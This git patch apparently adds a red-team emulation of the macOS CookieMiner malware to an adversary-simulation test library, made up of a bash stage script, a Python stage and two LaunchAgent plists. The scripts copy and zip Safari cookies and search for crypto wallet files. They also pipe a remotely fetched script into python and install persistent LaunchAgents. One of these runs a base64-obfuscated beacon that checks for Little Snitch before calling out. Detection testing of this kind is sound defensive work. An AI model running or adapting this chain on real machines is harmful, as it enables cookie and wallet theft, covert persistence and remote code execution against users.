From 8e2ec0aae1bb8d57da7d987632dee8e8837e0de7 Mon Sep 17 00:00:00 2001
From: Tony M Lambert <ForensicITGuy@users.noreply.github.com>
Date: Wed, 6 Feb 2019 11:52:31 -0700
Subject: [PATCH] CookieMiner Chain Reaction (#451)

* initial commit

* modified output style

* final url changes

* Update rocke-and-roll-stage-01.sh

* CookieMiner initial commit

* fix binary stuff

* Make quieter

* Ready for primetime
---
 ARTifacts/Chain_Reactions/atomic-hello.macos  | Bin 0 -> 8432 bytes
 .../cookie-miner-backdoor-launchagent.plist   |  16 ++++++
 .../cookie-miner-payload-launchagent.plist    |  14 +++++
 .../Chain_Reactions/cookie-miner-stage-01.sh  |  49 ++++++++++++++++++
 .../Chain_Reactions/cookie-miner-stage-02.py  |  25 +++++++++
 5 files changed, 104 insertions(+)
 create mode 100755 ARTifacts/Chain_Reactions/atomic-hello.macos
 create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
 create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
 create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
 create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-stage-02.py

diff --git a/ARTifacts/Chain_Reactions/atomic-hello.macos b/ARTifacts/Chain_Reactions/atomic-hello.macos
new file mode 100755
index 0000000000000000000000000000000000000000..ff1adeb061375c6a84696e354bbbd1a9f6a41630
GIT binary patch
literal 8432
zcmeHMO=}ZD7@qXQmRjo;LHww)Emr)1wu%Qughm=nY0-W}C<Pglc54Egq$V3|^inAz
zJrr`)lShww>rqg!o+_UF0V)*~Ja`Zh<MZs!CY!B#^CI)YyYD<R?>sy6%q$E$o8LeG
zY!f2VEW~n?5Mnp{S&I<&go%<6`{8l8loQcQvDw(v71lOdq!IoWk>@QErA)+T5{)Tt
zf1|NZD2%a*R^`l)(y^8tmOKmdO<)4#JE7W%F`c@#h~+vUU(qS0inXdR-)+UWLuL5b
z@6fLJ{C1B|rY(EXDj+G$x2*UMC<0>YUbAiEn=3knOzwtC2=hHue1}y#anKsL(I90h
zcPo>dmzmr`-o=gUv99>I<}~6khu7jgxvpDqDMzA-XrKk_*RZbs`Uch&d#=VUWzLqx
zayFH><)TygBcD&h{lWgeQGfS+szORT`8PfT{h8mc@`;0d+;>4-{|?4SFOS7WM*Tf(
zhUN)O`{D&bp5VCp@SP2@&Gg>gj<}ClnQ01l>klC^kJ__64a|MKj(8SvCwu}PH0Jsq
ztPhqSo1yPPHFhDQNp!*oOU1&Vok<POm+g6A+CezS@#bV(Y|s63vyaBU&TKv{_nbzZ
z36H=<SBL8?yV`X=i10f!*rx0l=1(4emqFuuIWM+x4y_ySFx^OfEEvypx#(Egfr|qe
zS0;rd*ikt7ubZBp#}%et+Oz^%0j+>mKr5gX&<bb;v;zNHfvfS=_wkiaMttqUdA#do
z><8cYL~QLsIQ42Z_HA_|zVgDj_Pp9(LDl%$p}Ppt>1zK?#7Y_u@$o~oT8&$_oi`T>
z`K%dr^4ZLsIc3e82`icHH9Oq%b`Nu5!N{{S&(>!U>37sQn`NHKJJHkdPU}GR0s*ap
zeD^HxLH*PUXa%$aS^=$qRzNGD70?Q31+)TM0j+>m;6G5HyU&>9G`fd*+2>w{%M|X1
zad|yi5EW4{x`*W=E})$SAXr4=KE6q2)6!b9=1Pu*yY3{@d$Y+*PW1B!M6-D9-$(le
yR_~5@H-Y@Wu-C=jzY1dh!$7S4dN>lo9xW<`7-reT4e|CdNOuhWc(=_6{eA%tFTbGx

literal 0
HcmV?d00001

diff --git a/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist b/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
new file mode 100644
index 00000000..c07c8a3e
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+<key>Label</key>
+<string>cookie-miner-backdoor-launchagent.plist</string>
+<key>ProgramArguments</key>
+<array>
+<string>python</string>
+<string>-c</string>
+<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
+</array>
+<key>RunAtLoad</key>
+<true/>
+</dict>
+</plist>
\ No newline at end of file
diff --git a/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist b/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
new file mode 100644
index 00000000..d6cfb2cf
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>ProgramArguments</key>
+	<array>
+		<string>/Users/Shared/xmrig2</string>
+	</array>
+	<key>RunAtLoad</key>
+	<true/>
+	<key>Label</key>
+	<string>cookie-miner-payload-launchagent.plist</string>
+</dict>
+</plist>
\ No newline at end of file
diff --git a/ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh b/ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
new file mode 100644
index 00000000..bf46c190
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
@@ -0,0 +1,49 @@
+#! /bin/bash
+
+#   Tactic: Discovery
+#   Technique: T1033 - System Owner/User Discovery
+OUTPUT="$(id -un)"
+
+#   Tactic: Collection
+#   Technique: T1005 - Data from Local System
+cd ~/Library/Cookies
+grep -q "coinbase" "Cookies.binarycookies"
+
+#   Tactic: Collection
+#   Technique: T1074 - Data Staged
+mkdir ${OUTPUT}
+cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
+
+#   Tactic: Exfiltration
+#   Technique: T1002 - Data Compressed
+zip -r interestingsafaricookies.zip ${OUTPUT}
+
+#   Tactic: Exfiltration
+#   Technique: T1048 - Exfiltration Over Alternative Protocol
+#   Simulate network connection for exfiltration
+curl https://atomicredteam.io > /dev/null
+
+curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
+
+#   Tactic: Discovery
+#   Technique: T1083 - File and Directory Discovery
+find ~ -name "*wallet*" > interestingfiles.txt
+cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
+
+#   Tactic: Persistence
+#   Technique: T1159 - Launch Agent
+mkdir -p ~/Library/LaunchAgents
+cd ~/Library/LaunchAgents
+curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+launchctl load -w com.apple.rig2.plist
+launchctl load -w com.proxy.initialize.plist
+
+
+cd /Users/Shared
+curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
+
+#   Tactic: Defense Evasion
+#   Technique: T1222 - File Permissions Modification
+chmod +x ./xmrig2
+./xmrig2
\ No newline at end of file
diff --git a/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py b/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
new file mode 100644
index 00000000..fa5ea5f5
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
@@ -0,0 +1,25 @@
+# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
+# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
+# out = ps.stdout.read()
+# ps.stdout.close()
+# if re.search("Little Snitch", out):
+#    sys.exit()
+# import urllib2;
+# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
+# req.add_header('User-Agent',UA);
+# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
+# proxy = urllib2.ProxyHandler();
+# o = urllib2.build_opener(proxy);
+# urllib2.install_opener(o);
+# a=urllib2.urlopen(req).read();
+
+# Tactic: Defense Evasion
+# Technique: T1140 - Deobfuscate/Decode Files or Information
+#
+# Tactic: Discovery
+# Technique: T1057 - Process Discovery
+#
+# Tactic: Command and Control
+# Technique: T1043 - Commonly Used Port
+#
+import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
\ No newline at end of file